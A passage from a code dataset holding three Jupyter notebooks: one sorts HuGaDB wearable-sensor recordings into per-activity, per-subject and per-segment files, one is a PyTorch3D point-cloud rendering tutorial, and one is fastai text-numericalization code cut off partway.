] | 1 | 2022-03-27T02:18:27.000Z | 2022-03-27T02:18:27.000Z | organize_test_data.ipynb | dchiasson/kinetic_codec | ac9ee223980937af4bdd35b044e6d620bfcb2a1e | [
"MIT"
] | null | null | null | organize_test_data.ipynb | dchiasson/kinetic_codec | ac9ee223980937af4bdd35b044e6d620bfcb2a1e | [
"MIT"
] | null | null | null | 38.019669 | 139 | 0.636208 | [
[
[
"import sys, os\nimport pandas as pd\nimport numpy as np\nimport csv\nimport shutil",
"_____no_output_____"
],
[
"def append_to_binary(file_name, data):\n #print(file_name)\n with open(file_name, 'ab') as bin_file:\n bin_file.write(data)\n\ndef append_line_to_csv(file_name, line):\n with open(file_name, 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(line)\n\ndef append_batch_to_csv(file_name, data):\n #print(file_name)\n with open(file_name, 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerows(data)\n",
"_____no_output_____"
],
[
"trainers = [5,12,9]\ntesters = list(range(1, 18+1))\n[testers.remove(a) for a in trainers]\n\n#file_list = ['HuGaDB_v1_walking_04_05.txt']\nfile_list = os.listdir()\nfile_list = list(filter(lambda x: x.split('.')[-1] == 'txt', file_list))\nfile_list = sorted(file_list)\nACCEL_FIX = 9.80665*2.0/32768 # m/s^2\nGYRO_FIX = 2000/32768 # deg/sec\n\nSENS = ['acc', 'gyro']\nLOCS = ['rf','rs','rt','lf','ls','lt']\nACTS = ['bicycling','running','sitting','standing','walking']\nDIMS = ['x','y','z']\n\nprocessed_dir = 'processed'\nactivity_dir = os.path.join(processed_dir, 'activity')\nsegment_dir = os.path.join(processed_dir, 'segment')\nsubject_dir = os.path.join(processed_dir, 'subject')\ntraining_dir = os.path.join(processed_dir, 'training')\nfile_dir = os.path.join(processed_dir, 'files')\n\ntry:\n shutil.rmtree(processed_dir)\nexcept FileNotFoundError:\n pass\nos.mkdir(processed_dir)\nos.mkdir(activity_dir)\n[os.mkdir(os.path.join(activity_dir, a)) for a in ACTS]\nos.mkdir(segment_dir)\n[os.mkdir(os.path.join(segment_dir, a)) for a in LOCS]\nos.mkdir(subject_dir)\n[os.mkdir(os.path.join(subject_dir, str(a))) for a in testers]\nos.mkdir(training_dir)\nos.mkdir(file_dir)\n[os.mkdir(os.path.join(file_dir, file_name)) for file_name in file_list]\n\nfor data_file in file_list:\n print(data_file)\n data = pd.read_csv(data_file, sep='\\t')\n subject = int(data_file.split('_')[-2])\n activity = data_file.split('_')[2]\n for loc in LOCS:\n sensor_data = []\n human_readable_data = []\n for sen in SENS:\n for dim in DIMS:\n one_d = data['{}_{}_{}'.format(sen, loc, dim)].values\n if sen=='acc':\n human_readable_data.append(one_d*ACCEL_FIX)\n sensor_data.append(one_d/4)\n one_d = one_d / 4 # The acceleraton sensor doesn't use the two LS bits\n if sen=='gyro':\n sensor_data.append(one_d)\n human_readable_data.append(one_d*GYRO_FIX)\n\n data_file_dir = os.path.join(file_dir, data_file)\n append_to_binary(os.path.join(data_file_dir, \"{}_{}_{}\".format(loc, sen, dim)), one_d.astype(np.int16))\n\n if subject in trainers:\n append_to_binary(os.path.join(training_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n else:\n # all test\n append_to_binary(os.path.join(processed_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # activity\n if activity in ACTS:\n append_to_binary(os.path.join(activity_dir, activity, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # segment\n append_to_binary(os.path.join(segment_dir, loc, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # subject\n append_to_binary(os.path.join(subject_dir, str(subject), \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n \n if subject in trainers:\n append_batch_to_csv(os.path.join(training_dir,'all.csv'), zip(*human_readable_data))\n else:\n append_batch_to_csv(os.path.join(processed_dir, 'all.csv'), zip(*human_readable_data))\n if activity in ACTS:\n append_batch_to_csv(os.path.join(activity_dir, activity, 'all.csv'), zip(*human_readable_data))\n append_batch_to_csv(os.path.join(segment_dir, loc, 'all.csv'), zip(*human_readable_data))\n append_batch_to_csv(os.path.join(subject_dir, str(subject), 'all.csv'), zip(*human_readable_data))\n\n if subject in trainers:\n append_batch_to_csv(os.path.join(training_dir,'all2.csv'), zip(*sensor_data))\n else:\n append_batch_to_csv(os.path.join(processed_dir, 'all2.csv'), zip(*sensor_data))\n if activity in ACTS:\n append_batch_to_csv(os.path.join(activity_dir, activity, 'all2.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(segment_dir, loc, 'all2.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(subject_dir, str(subject), 'all2.csv'), zip(*sensor_data))\n\n \n\n\n",
"HuGaDB_v1_bicycling_01_00.txt\nHuGaDB_v1_bicycling_01_01.txt\nHuGaDB_v1_bicycling_01_02.txt\nHuGaDB_v1_bicycling_01_03.txt\nHuGaDB_v1_bicycling_01_04.txt\nHuGaDB_v1_bicycling_01_05.txt\nHuGaDB_v1_bicycling_01_06.txt\nHuGaDB_v1_bicycling_01_07.txt\nHuGaDB_v1_bicycling_01_08.txt\nHuGaDB_v1_bicycling_01_09.txt\nHuGaDB_v1_bicycling_01_10.txt\nHuGaDB_v1_bicycling_01_11.txt\nHuGaDB_v1_bicycling_01_12.txt\nHuGaDB_v1_bicycling_01_13.txt\nHuGaDB_v1_bicycling_01_14.txt\nHuGaDB_v1_bicycling_01_15.txt\nHuGaDB_v1_bicycling_01_16.txt\nHuGaDB_v1_bicycling_01_17.txt\nHuGaDB_v1_bicycling_01_18.txt\nHuGaDB_v1_down_by_elevator_12_00.txt\nHuGaDB_v1_running_03_00.txt\nHuGaDB_v1_running_03_01.txt\nHuGaDB_v1_running_07_00.txt\nHuGaDB_v1_running_07_01.txt\nHuGaDB_v1_running_07_02.txt\nHuGaDB_v1_running_08_00.txt\nHuGaDB_v1_running_08_01.txt\nHuGaDB_v1_running_08_02.txt\nHuGaDB_v1_running_08_03.txt\nHuGaDB_v1_running_09_00.txt\nHuGaDB_v1_running_09_01.txt\nHuGaDB_v1_running_09_02.txt\nHuGaDB_v1_sitting_02_00.txt\nHuGaDB_v1_sitting_02_01.txt\nHuGaDB_v1_sitting_03_00.txt\nHuGaDB_v1_sitting_03_01.txt\nHuGaDB_v1_sitting_03_02.txt\nHuGaDB_v1_sitting_03_03.txt\nHuGaDB_v1_sitting_04_00.txt\nHuGaDB_v1_sitting_04_01.txt\nHuGaDB_v1_sitting_04_02.txt\nHuGaDB_v1_sitting_04_03.txt\nHuGaDB_v1_sitting_05_00.txt\nHuGaDB_v1_sitting_05_01.txt\nHuGaDB_v1_sitting_06_00.txt\nHuGaDB_v1_sitting_06_01.txt\nHuGaDB_v1_sitting_06_02.txt\nHuGaDB_v1_sitting_06_03.txt\nHuGaDB_v1_sitting_06_04.txt\nHuGaDB_v1_sitting_07_00.txt\nHuGaDB_v1_sitting_07_01.txt\nHuGaDB_v1_sitting_07_02.txt\nHuGaDB_v1_sitting_07_03.txt\nHuGaDB_v1_sitting_07_04.txt\nHuGaDB_v1_sitting_08_00.txt\nHuGaDB_v1_sitting_08_01.txt\nHuGaDB_v1_sitting_08_02.txt\nHuGaDB_v1_sitting_09_00.txt\nHuGaDB_v1_sitting_09_01.txt\nHuGaDB_v1_sitting_09_02.txt\nHuGaDB_v1_sitting_09_03.txt\nHuGaDB_v1_sitting_10_00.txt\nHuGaDB_v1_sitting_10_01.txt\nHuGaDB_v1_sitting_10_02.txt\nHuGaDB_v1_sitting_10_03.txt\nHuGaDB_v1_sitting_10_04.txt\nHuGaDB_v1_sitting_11_00.txt\nHuGaDB_v1_sitting_11_01.txt\nHuGaDB_v1_sitting_11_02.txt\nHuGaDB_v1_sitting_11_03.txt\nHuGaDB_v1_sitting_12_00.txt\nHuGaDB_v1_sitting_12_01.txt\nHuGaDB_v1_sitting_12_02.txt\nHuGaDB_v1_sitting_12_03.txt\nHuGaDB_v1_sitting_13_00.txt\nHuGaDB_v1_sitting_13_01.txt\nHuGaDB_v1_sitting_13_02.txt\nHuGaDB_v1_sitting_13_03.txt\nHuGaDB_v1_sitting_13_04.txt\nHuGaDB_v1_sitting_13_05.txt\nHuGaDB_v1_sitting_13_06.txt\nHuGaDB_v1_sitting_14_00.txt\nHuGaDB_v1_sitting_14_01.txt\nHuGaDB_v1_sitting_14_02.txt\nHuGaDB_v1_sitting_14_03.txt\nHuGaDB_v1_sitting_15_00.txt\nHuGaDB_v1_sitting_15_01.txt\nHuGaDB_v1_sitting_15_02.txt\nHuGaDB_v1_sitting_15_03.txt\nHuGaDB_v1_sitting_16_00.txt\nHuGaDB_v1_sitting_16_01.txt\nHuGaDB_v1_sitting_16_02.txt\nHuGaDB_v1_sitting_16_03.txt\nHuGaDB_v1_sitting_16_04.txt\nHuGaDB_v1_sitting_16_05.txt\nHuGaDB_v1_sitting_17_00.txt\nHuGaDB_v1_sitting_17_01.txt\nHuGaDB_v1_sitting_17_02.txt\nHuGaDB_v1_sitting_17_03.txt\nHuGaDB_v1_sitting_17_04.txt\nHuGaDB_v1_sitting_17_05.txt\nHuGaDB_v1_sitting_17_06.txt\nHuGaDB_v1_sitting_18_00.txt\nHuGaDB_v1_sitting_18_01.txt\nHuGaDB_v1_sitting_18_02.txt\nHuGaDB_v1_sitting_18_03.txt\nHuGaDB_v1_sitting_18_04.txt\nHuGaDB_v1_sitting_in_car_01_00.txt\nHuGaDB_v1_sitting_in_car_01_01.txt\nHuGaDB_v1_sitting_in_car_01_02.txt\nHuGaDB_v1_sitting_in_car_01_03.txt\nHuGaDB_v1_sitting_in_car_01_04.txt\nHuGaDB_v1_sitting_in_car_01_05.txt\nHuGaDB_v1_sitting_in_car_01_06.txt\nHuGaDB_v1_sitting_in_car_01_07.txt\nHuGaDB_v1_sitting_in_car_01_08.txt\nHuGaDB_v1_sitting_in_car_01_09.txt\nHuGaDB_v1_sitting_in_car_01_10.txt\nHuGaDB_v1_sitting_in_car_01_11.txt\nHuGaDB_v1_sitting_in_car_01_12.txt\nHuGaDB_v1_sitting_in_car_01_13.txt\nHuGaDB_v1_sitting_in_car_01_14.txt\nHuGaDB_v1_standing_01_00.txt\nHuGaDB_v1_standing_01_01.txt\nHuGaDB_v1_standing_01_02.txt\nHuGaDB_v1_standing_01_03.txt\nHuGaDB_v1_standing_03_00.txt\nHuGaDB_v1_standing_04_00.txt\nHuGaDB_v1_standing_04_01.txt\nHuGaDB_v1_standing_04_02.txt\nHuGaDB_v1_standing_04_03.txt\nHuGaDB_v1_standing_05_00.txt\nHuGaDB_v1_standing_05_01.txt\nHuGaDB_v1_standing_06_00.txt\nHuGaDB_v1_standing_07_00.txt\nHuGaDB_v1_standing_07_01.txt\nHuGaDB_v1_standing_07_02.txt\nHuGaDB_v1_standing_07_03.txt\nHuGaDB_v1_standing_08_00.txt\nHuGaDB_v1_standing_08_01.txt\nHuGaDB_v1_standing_08_02.txt\nHuGaDB_v1_standing_08_03.txt\nHuGaDB_v1_standing_09_00.txt\nHuGaDB_v1_standing_09_01.txt\nHuGaDB_v1_standing_09_02.txt\nHuGaDB_v1_standing_09_03.txt\nHuGaDB_v1_standing_09_04.txt\nHuGaDB_v1_standing_10_00.txt\nHuGaDB_v1_standing_10_01.txt\nHuGaDB_v1_standing_10_02.txt\nHuGaDB_v1_standing_10_03.txt\nHuGaDB_v1_standing_11_00.txt\nHuGaDB_v1_standing_11_01.txt\nHuGaDB_v1_standing_11_02.txt\nHuGaDB_v1_standing_11_03.txt\nHuGaDB_v1_standing_11_04.txt\nHuGaDB_v1_standing_12_00.txt\nHuGaDB_v1_standing_12_01.txt\nHuGaDB_v1_standing_12_02.txt\nHuGaDB_v1_standing_12_03.txt\nHuGaDB_v1_standing_12_04.txt\nHuGaDB_v1_standing_13_00.txt\nHuGaDB_v1_standing_13_01.txt\nHuGaDB_v1_standing_13_02.txt\nHuGaDB_v1_standing_13_03.txt\nHuGaDB_v1_standing_15_00.txt\nHuGaDB_v1_standing_15_01.txt\nHuGaDB_v1_standing_15_02.txt\nHuGaDB_v1_standing_15_03.txt\nHuGaDB_v1_standing_15_04.txt\nHuGaDB_v1_standing_16_00.txt\nHuGaDB_v1_standing_16_01.txt\nHuGaDB_v1_standing_16_02.txt\nHuGaDB_v1_standing_16_03.txt\nHuGaDB_v1_standing_16_04.txt\nHuGaDB_v1_standing_17_00.txt\nHuGaDB_v1_standing_17_01.txt\nHuGaDB_v1_standing_17_02.txt\nHuGaDB_v1_standing_17_03.txt\nHuGaDB_v1_standing_18_00.txt\nHuGaDB_v1_standing_18_01.txt\nHuGaDB_v1_standing_18_02.txt\nHuGaDB_v1_standing_18_03.txt\nHuGaDB_v1_standing_18_04.txt\nHuGaDB_v1_various_01_00.txt\nHuGaDB_v1_various_01_01.txt\nHuGaDB_v1_various_01_02.txt\nHuGaDB_v1_various_01_03.txt\nHuGaDB_v1_various_01_04.txt\nHuGaDB_v1_various_01_05.txt\nHuGaDB_v1_various_01_06.txt\nHuGaDB_v1_various_01_07.txt\nHuGaDB_v1_various_01_08.txt\nHuGaDB_v1_various_01_09.txt\nHuGaDB_v1_various_01_10.txt\nHuGaDB_v1_various_01_11.txt\nHuGaDB_v1_various_01_12.txt\nHuGaDB_v1_various_01_13.txt\nHuGaDB_v1_various_01_14.txt\nHuGaDB_v1_various_01_15.txt\nHuGaDB_v1_various_01_16.txt\nHuGaDB_v1_various_02_00.txt\nHuGaDB_v1_various_02_01.txt\nHuGaDB_v1_various_02_02.txt\nHuGaDB_v1_various_02_03.txt\nHuGaDB_v1_various_02_04.txt\nHuGaDB_v1_various_02_05.txt\nHuGaDB_v1_various_02_06.txt\nHuGaDB_v1_various_03_00.txt\nHuGaDB_v1_various_03_01.txt\nHuGaDB_v1_various_03_02.txt\nHuGaDB_v1_various_03_03.txt\nHuGaDB_v1_various_03_04.txt\nHuGaDB_v1_various_03_05.txt\nHuGaDB_v1_various_03_06.txt\nHuGaDB_v1_various_03_07.txt\nHuGaDB_v1_various_03_08.txt\nHuGaDB_v1_various_03_09.txt\nHuGaDB_v1_various_03_10.txt\nHuGaDB_v1_various_03_11.txt\nHuGaDB_v1_various_03_12.txt\nHuGaDB_v1_various_03_13.txt\nHuGaDB_v1_various_03_14.txt\nHuGaDB_v1_various_03_15.txt\nHuGaDB_v1_various_03_16.txt\nHuGaDB_v1_various_03_17.txt\nHuGaDB_v1_various_03_18.txt\nHuGaDB_v1_various_03_19.txt\nHuGaDB_v1_various_03_20.txt\nHuGaDB_v1_various_03_21.txt\nHuGaDB_v1_various_03_22.txt\nHuGaDB_v1_various_03_23.txt\nHuGaDB_v1_various_03_24.txt\nHuGaDB_v1_various_04_00.txt\nHuGaDB_v1_various_04_01.txt\nHuGaDB_v1_various_04_02.txt\nHuGaDB_v1_various_04_03.txt\nHuGaDB_v1_various_04_04.txt\nHuGaDB_v1_various_04_05.txt\nHuGaDB_v1_various_04_06.txt\nHuGaDB_v1_various_04_07.txt\nHuGaDB_v1_various_04_08.txt\nHuGaDB_v1_various_04_09.txt\nHuGaDB_v1_various_04_10.txt\nHuGaDB_v1_various_04_11.txt\nHuGaDB_v1_various_04_12.txt\nHuGaDB_v1_various_04_13.txt\nHuGaDB_v1_various_04_14.txt\nHuGaDB_v1_various_04_15.txt\nHuGaDB_v1_various_04_16.txt\nHuGaDB_v1_various_04_17.txt\nHuGaDB_v1_various_04_18.txt\nHuGaDB_v1_various_04_19.txt\nHuGaDB_v1_various_05_00.txt\nHuGaDB_v1_various_05_01.txt\nHuGaDB_v1_various_05_02.txt\nHuGaDB_v1_various_05_03.txt\nHuGaDB_v1_various_05_04.txt\nHuGaDB_v1_various_05_05.txt\nHuGaDB_v1_various_05_06.txt\nHuGaDB_v1_various_05_07.txt\nHuGaDB_v1_various_05_08.txt\nHuGaDB_v1_various_05_09.txt\nHuGaDB_v1_various_05_10.txt\nHuGaDB_v1_various_05_11.txt\nHuGaDB_v1_various_05_12.txt\nHuGaDB_v1_various_05_13.txt\nHuGaDB_v1_various_05_14.txt\nHuGaDB_v1_various_05_15.txt\nHuGaDB_v1_various_05_16.txt\nHuGaDB_v1_various_05_17.txt\nHuGaDB_v1_various_05_18.txt\nHuGaDB_v1_various_05_19.txt\nHuGaDB_v1_various_05_20.txt\nHuGaDB_v1_various_06_00.txt\nHuGaDB_v1_various_06_01.txt\nHuGaDB_v1_various_06_02.txt\nHuGaDB_v1_various_06_03.txt\nHuGaDB_v1_various_06_04.txt\nHuGaDB_v1_various_06_05.txt\nHuGaDB_v1_various_06_06.txt\nHuGaDB_v1_various_06_07.txt\nHuGaDB_v1_various_06_08.txt\nHuGaDB_v1_various_06_09.txt\nHuGaDB_v1_various_06_10.txt\n"
],
[
"trainers = [5,12,9]\ntesters = list(range(1, 18+1))\n[testers.remove(a) for a in trainers]\n\nfile_list = ['HuGaDB_v1_walking_06_04.txt']\n#file_list = os.listdir()\nfile_list = list(filter(lambda x: x.split('.')[-1] == 'txt', file_list))\nACCEL_FIX = 9.80665*2.0/32768 # m/s^2\nGYRO_FIX = 2000/32768 # deg/sec\n\nSENS = ['acc', 'gyro']\n#LOCS = ['rf','rs','rt','lf','ls','lt']\nLOCS = ['rf']\nACTS = ['bicycling','running','sitting','standing','walking']\nDIMS = ['x','y','z']\n\nprocessed_dir = 'processed'\nactivity_dir = os.path.join(processed_dir, 'activity')\nsegment_dir = os.path.join(processed_dir, 'segment')\nsubject_dir = os.path.join(processed_dir, 'subject')\ntraining_dir = os.path.join(processed_dir, 'training')\n\ntry:\n shutil.rmtree(processed_dir)\nexcept FileNotFoundError:\n pass\nos.mkdir(processed_dir)\nos.mkdir(activity_dir)\n[os.mkdir(os.path.join(activity_dir, a)) for a in ACTS]\nos.mkdir(segment_dir)\n[os.mkdir(os.path.join(segment_dir, a)) for a in LOCS]\nos.mkdir(subject_dir)\n[os.mkdir(os.path.join(subject_dir, str(a))) for a in testers]\nos.mkdir(training_dir)\n\ndata = pd.read_csv(file_list[0],sep='\\t')\n\nfor data_file in file_list:\n print(data_file)\n subject = int(data_file.split('_')[-2])\n activity = data_file.split('_')[2]\n for loc in LOCS:\n sensor_data = []\n for sen in SENS:\n for dim in DIMS:\n one_d = data['{}_{}_{}'.format(sen, loc, dim)].values\n if sen=='acc':\n sensor_data.append(one_d*ACCEL_FIX)\n if sen=='gyro':\n sensor_data.append(one_d*GYRO_FIX)\n \n if subject in trainers:\n append_to_binary(os.path.join(training_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n else:\n # all test\n append_to_binary(os.path.join(processed_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # activity\n if activity in ACTS:\n append_to_binary(os.path.join(activity_dir, activity, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # segment\n append_to_binary(os.path.join(segment_dir, loc, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # subject\n append_to_binary(os.path.join(subject_dir, str(subject), \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n \n if subject in trainers:\n append_batch_to_csv(os.path.join(training_dir,'all.csv'), zip(*sensor_data))\n else:\n append_batch_to_csv(os.path.join(processed_dir, 'all.csv'), zip(*sensor_data))\n if activity in ACTS:\n append_batch_to_csv(os.path.join(activity_dir, activity, 'all.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(segment_dir, loc, 'all.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(subject_dir, str(subject), 'all.csv'), zip(*sensor_data))\n\n \n\n\n",
"HuGaDB_v1_walking_06_04.txt\n"
],
[
"file_list[0]",
"_____no_output_____"
],
[
"data = pd.read_csv(file_list[0], sep='\\t')",
"_____no_output_____"
],
[
"data['gyro_rf_z'].values",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70792aed6597c82f68063b7e7dcbd0d58b88427 | 243,773 | ipynb | Jupyter Notebook | docs/tutorials/render_colored_points.ipynb | ladzin/pytorch3d | b2b0c5a4426bb907517452a6fe643eda39dd73c8 | [
"BSD-3-Clause"
] | null | null | null | docs/tutorials/render_colored_points.ipynb | ladzin/pytorch3d | b2b0c5a4426bb907517452a6fe643eda39dd73c8 | [
"BSD-3-Clause"
] | null | null | null | docs/tutorials/render_colored_points.ipynb | ladzin/pytorch3d | b2b0c5a4426bb907517452a6fe643eda39dd73c8 | [
"BSD-3-Clause"
] | null | null | null | 732.051051 | 123,524 | 0.952575 | [
[
[
"# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.",
"_____no_output_____"
]
],
[
[
"# Render a colored point cloud\n\nThis tutorial shows how to:\n- set up a renderer \n- render the point cloud \n- vary the rendering settings such as compositing and camera position",
"_____no_output_____"
],
[
"## Import modules",
"_____no_output_____"
],
[
"If `torch`, `torchvision` and `pytorch3d` are not installed, run the following cell:",
"_____no_output_____"
]
],
[
[
"!pip install torch torchvision\n!pip install 'git+https://github.com/facebookresearch/pytorch3d.git'",
"_____no_output_____"
],
[
"import os\nos.chdir('../..')\nimport torch\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\n# Util function for loading point clouds\nimport numpy as np\n\n# Data structures and functions for rendering\nfrom pytorch3d.structures import Pointclouds\nfrom pytorch3d.renderer import (\n look_at_view_transform,\n OpenGLOrthographicCameras, \n PointsRasterizationSettings,\n PointsRenderer,\n PointsRasterizer,\n AlphaCompositor,\n NormWeightedCompositor\n)",
"_____no_output_____"
]
],
[
[
"### Load a point cloud and corresponding colors\n\nLoad a `.ply` file and create a **Point Cloud** object. \n\n**Pointclouds** is a unique datastructure provided in PyTorch3D for working with batches of point clouds of different sizes. ",
"_____no_output_____"
],
[
"If running this notebook using **Google Colab**, run the following cell to fetch the pointcloud data and save it at the path `data/PittsburghBridge`:\nIf running locally, the data is already available at the correct path. ",
"_____no_output_____"
]
],
[
[
"!mkdir -p data/PittsburghBridge\n!wget -P data/PittsburghBridge https://dl.fbaipublicfiles.com/pytorch3d/data/PittsburghBridge/pointcloud.npz",
"_____no_output_____"
],
[
"# Setup\ndevice = torch.device(\"cuda:0\")\ntorch.cuda.set_device(device)\n\n# Set paths\nDATA_DIR = \"./data\"\nobj_filename = os.path.join(DATA_DIR, \"PittsburghBridge/pointcloud.npz\")\n\n# Load point cloud\npointcloud = np.load(obj_filename)\nverts = torch.Tensor(pointcloud['verts']).to(device)\nrgb = torch.Tensor(pointcloud['rgb']).to(device)\n\npoint_cloud = Pointclouds(points=[verts], features=[rgb])",
"_____no_output_____"
]
],
[
[
"## Create a renderer\n\nA renderer in PyTorch3D is composed of a **rasterizer** and a **shader** which each have a number of subcomponents such as a **camera** (orthgraphic/perspective). Here we initialize some of these components and use default values for the rest.\n\nIn this example we will first create a **renderer** which uses an **orthographic camera**, and applies **alpha compositing**. Then we learn how to vary different components using the modular API. \n\n[1] <a href=\"https://arxiv.org/abs/1912.08804\">SynSin: End to end View Synthesis from a Single Image.</a> Olivia Wiles, Georgia Gkioxari, Richard Szeliski, Justin Johnson. CVPR 2020.",
"_____no_output_____"
]
],
[
[
"# Initialize an OpenGL perspective camera.\nR, T = look_at_view_transform(20, 10, 0)\ncameras = OpenGLOrthographicCameras(device=device, R=R, T=T, znear=0.01)\n\n# Define the settings for rasterization and shading. Here we set the output image to be of size\n# 512x512. As we are rendering images for visualization purposes only we will set faces_per_pixel=1\n# and blur_radius=0.0. Refer to raster_points.py for explanations of these parameters. \nraster_settings = PointsRasterizationSettings(\n image_size=512, \n radius = 0.003,\n points_per_pixel = 10\n)\n\n\n# Create a points renderer by compositing points using an alpha compositor (nearer points\n# are weighted more heavily). See [1] for an explanation.\nrenderer = PointsRenderer(\n rasterizer=PointsRasterizer(\n cameras=cameras, \n raster_settings=raster_settings\n ),\n compositor=AlphaCompositor(\n device=device, \n composite_params=None\n )\n)\n",
"_____no_output_____"
],
[
"images = renderer(point_cloud)\nplt.figure(figsize=(10, 10))\nplt.imshow(images[0, ..., :3].cpu().numpy())\nplt.grid(\"off\")\nplt.axis(\"off\")",
"_____no_output_____"
]
],
[
[
"In this example we will first create a **renderer** which uses an **orthographic camera**, and applies **weighted compositing**. ",
"_____no_output_____"
]
],
[
[
"# Initialize an OpenGL perspective camera.\nR, T = look_at_view_transform(20, 10, 0)\ncameras = OpenGLOrthographicCameras(device=device, R=R, T=T, znear=0.01)\n\n# Define the settings for rasterization and shading. Here we set the output image to be of size\n# 512x512. As we are rendering images for visualization purposes only we will set faces_per_pixel=1\n# and blur_radius=0.0. Refer to rasterize_points.py for explanations of these parameters. \nraster_settings = PointsRasterizationSettings(\n image_size=512, \n radius = 0.003,\n points_per_pixel = 10\n)\n\n\n# Create a points renderer by compositing points using an weighted compositor (3D points are\n# weighted according to their distance to a pixel and accumulated using a weighted sum)\nrenderer = PointsRenderer(\n rasterizer=PointsRasterizer(\n cameras=cameras, \n raster_settings=raster_settings\n ),\n compositor=NormWeightedCompositor(\n device=device, \n composite_params=None\n )\n)\n",
"_____no_output_____"
],
[
"images = renderer(point_cloud)\nplt.figure(figsize=(10, 10))\nplt.imshow(images[0, ..., :3].cpu().numpy())\nplt.grid(\"off\")\nplt.axis(\"off\")",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e707976eeef89a871b2f4cd2694e98a92ed8dd04 | 77,620 | ipynb | Jupyter Notebook | nbs/31_text.data.ipynb | nightlifelover/fastai | 29be53d7ccaf7405320e2e47db8f35182abeff0a | [
"Apache-2.0"
] | null | null | null | nbs/31_text.data.ipynb | nightlifelover/fastai | 29be53d7ccaf7405320e2e47db8f35182abeff0a | [
"Apache-2.0"
] | null | null | null | nbs/31_text.data.ipynb | nightlifelover/fastai | 29be53d7ccaf7405320e2e47db8f35182abeff0a | [
"Apache-2.0"
] | null | null | null | 44.077229 | 1,049 | 0.578755 | [
[
[
"#hide\n#skip\n! [ -e /content ] && pip install -Uqq fastai # upgrade fastai on colab",
"_____no_output_____"
],
[
"#export\nfrom fastai.torch_basics import *\nfrom fastai.data.all import *\nfrom fastai.text.core import *",
"_____no_output_____"
],
[
"#hide\nfrom nbdev.showdoc import *",
"_____no_output_____"
],
[
"#default_exp text.data\n#default_cls_lvl 3",
"_____no_output_____"
]
],
[
[
"# Text data\n\n> Functions and transforms to help gather text data in a `Datasets`",
"_____no_output_____"
],
[
"## Backwards\n\nReversing the text can provide higher accuracy with an ensemble with a forward model. All that is needed is a `type_tfm` that will reverse the text as it is brought in:",
"_____no_output_____"
]
],
[
[
"#export\ndef reverse_text(x): return x.flip(0)",
"_____no_output_____"
],
[
"t = tensor([0,1,2])\nr = reverse_text(t)\ntest_eq(r, tensor([2,1,0]))",
"_____no_output_____"
]
],
[
[
"## Numericalizing",
"_____no_output_____"
],
[
"Numericalization is the step in which we convert tokens to integers. The first step is to build a correspondence token to index that is called a vocab.",
"_____no_output_____"
]
],
[
[
"#export\ndef make_vocab(count, min_freq=3, max_vocab=60000, special_toks=None):\n \"Create a vocab of `max_vocab` size from `Counter` `count` with items present more than `min_freq`\"\n vocab = [o for o,c in count.most_common(max_vocab) if c >= min_freq]\n special_toks = ifnone(special_toks, defaults.text_spec_tok)\n for o in reversed(special_toks): #Make sure all special tokens are in the vocab\n if o in vocab: vocab.remove(o)\n vocab.insert(0, o)\n vocab = vocab[:max_vocab]\n return vocab + [f'xxfake' for i in range(0, 8-len(vocab)%8)]",
"_____no_output_____"
]
],
[
[
"If there are more than `max_vocab` tokens, the ones kept are the most frequent.\n\n> Note: For performance when using mixed precision, the vocabulary is always made of size a multiple of 8, potentially by adding `xxfake` tokens.",
"_____no_output_____"
]
],
[
[
"count = Counter(['a', 'a', 'a', 'a', 'b', 'b', 'c', 'c', 'd'])\ntest_eq(set([x for x in make_vocab(count) if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'a'.split()))\ntest_eq(len(make_vocab(count))%8, 0)\ntest_eq(set([x for x in make_vocab(count, min_freq=1) if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'a b c d'.split()))\ntest_eq(set([x for x in make_vocab(count,max_vocab=12, min_freq=1) if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'a b c'.split()))",
"_____no_output_____"
],
[
"#export\nclass TensorText(TensorBase): pass\nclass LMTensorText(TensorText): pass\n\nTensorText.__doc__ = \"Semantic type for a tensor representing text\"\nLMTensorText.__doc__ = \"Semantic type for a tensor representing text in language modeling\"",
"_____no_output_____"
],
[
"#export\nclass Numericalize(Transform):\n \"Reversible transform of tokenized texts to numericalized ids\"\n def __init__(self, vocab=None, min_freq=3, max_vocab=60000, special_toks=None):\n store_attr('vocab,min_freq,max_vocab,special_toks')\n self.o2i = None if vocab is None else defaultdict(int, {v:k for k,v in enumerate(vocab)})\n\n def setups(self, dsets):\n if dsets is None: return\n if self.vocab is None:\n count = dsets.counter if getattr(dsets, 'counter', None) is not None else Counter(p for o in dsets for p in o)\n if self.special_toks is None and hasattr(dsets, 'special_toks'):\n self.special_toks = dsets.special_toks\n self.vocab = make_vocab(count, min_freq=self.min_freq, max_vocab=self.max_vocab, special_toks=self.special_toks)\n self.o2i = defaultdict(int, {v:k for k,v in enumerate(self.vocab) if v != 'xxfake'})\n\n def encodes(self, o): return TensorText(tensor([self.o2i [o_] for o_ in o]))\n def decodes(self, o): return L(self.vocab[o_] for o_ in o)",
"_____no_output_____"
],
[
